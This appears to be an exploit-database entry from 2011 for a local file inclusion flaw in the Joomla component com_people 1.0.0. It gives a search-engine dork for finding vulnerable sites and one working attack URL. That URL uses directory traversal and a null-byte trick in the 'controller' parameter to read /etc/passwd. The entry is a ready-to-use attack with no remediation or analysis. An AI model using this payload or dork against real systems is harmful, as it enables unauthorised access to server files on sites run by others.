[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : People Joomla Component 1.0.0 Local File Inclusion Vulnerability
# Published : 2011-01-16
# Author : altbta
# Previous Title : SiteScape Enterprise Forum 7 TCL Injection
# Next Title : LifeType 1.2.10 HTTP Referer stored XSS


####################################################################
>>>>> Author : altbta [altbta@gmail.com]
>>>>> Home : [xp10.com]
>>>>> Script : Joomla Component com_people
>>>>> Bug Type : Local File Inclusion Vulnerability
>>>>> Dork : inurl:"/index.php?option=com_people"
>>>>> Vendor : http://www.ptt-solution.com
####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_people&controller=../../../../../../../../../../../../../../../../../../etc/passwd%00


####################################################################
RxH & ab0-3th4b & MeTo & R3d-D3v!L &*
DR_ALWALEED<http://www.xp10.com/xp10/members/178149-DR_ALWALEED>
*